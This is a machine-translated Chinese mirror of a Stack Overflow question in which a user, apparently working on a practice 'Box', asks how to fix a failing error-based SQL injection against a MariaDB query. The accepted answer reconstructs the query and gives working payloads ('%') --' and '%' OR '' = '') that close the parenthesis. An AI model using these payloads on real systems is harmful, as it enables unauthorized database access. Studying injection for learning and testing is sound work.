文章/答案/技术大牛

发布

社区首页 >问答首页 >如何在基于MariaDB错误的SQL注入中找到正确的语法？

问如何在基于MariaDB错误的SQL注入中找到正确的语法？
EN

Stack Overflow用户

提问于 2018-11-25 12:12:27

回答 1查看 1.7K关注 0票数 0

我正在尝试将SQL语句注入Box。我有以下注射点：

example.com/?o=1&page=app

当我注入1‘时，我会收到以下错误消息：

DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like '1'') LIMIT 10' at line 1

我试着注射以下东西：

1' ORDER BY 1 --

我仍然收到错误消息，我不知道如何关闭该语句：

DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'ORDER BY 1 --') and ( dest like '5' or dest like '1' ORDER BY 1 --') LIMIT 10' at line 1

我做错什么了？谢谢你的回答！

syntax

mariadb

sql-injection

回答 1

Stack Overflow用户

回答已采纳

发布于 2018-11-25 12:40:31

假设在尝试1'时，查询包含了'1''，那么原始查询似乎如下所示：

... '5' or dest like '$o') LIMIT 10

例如：

SELECT * FROM table WHERE (category = '5' or dest like '$o') LIMIT 10

要使它成为有效的查询，您需要关闭括号。

例如%') --，给予：

SELECT * FROM table WHERE (category = '5' or dest like '%') --') LIMIT 10

或%' OR '' = '，给予：

SELECT * FROM table WHERE (category = '5' or dest like '%' OR '' = '') LIMIT 10

票数 0

页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持

原文链接：

https://stackoverflow.com/questions/53467311

复制

相似问题

问如何在基于MariaDB错误的SQL注入中找到正确的语法？
EN

回答 1

Stack Overflow用户

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐

问如何在基于MariaDB错误的SQL注入中找到正确的语法？EN

回答 1

Stack Overflow用户

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐

问如何在基于MariaDB错误的SQL注入中找到正确的语法？
EN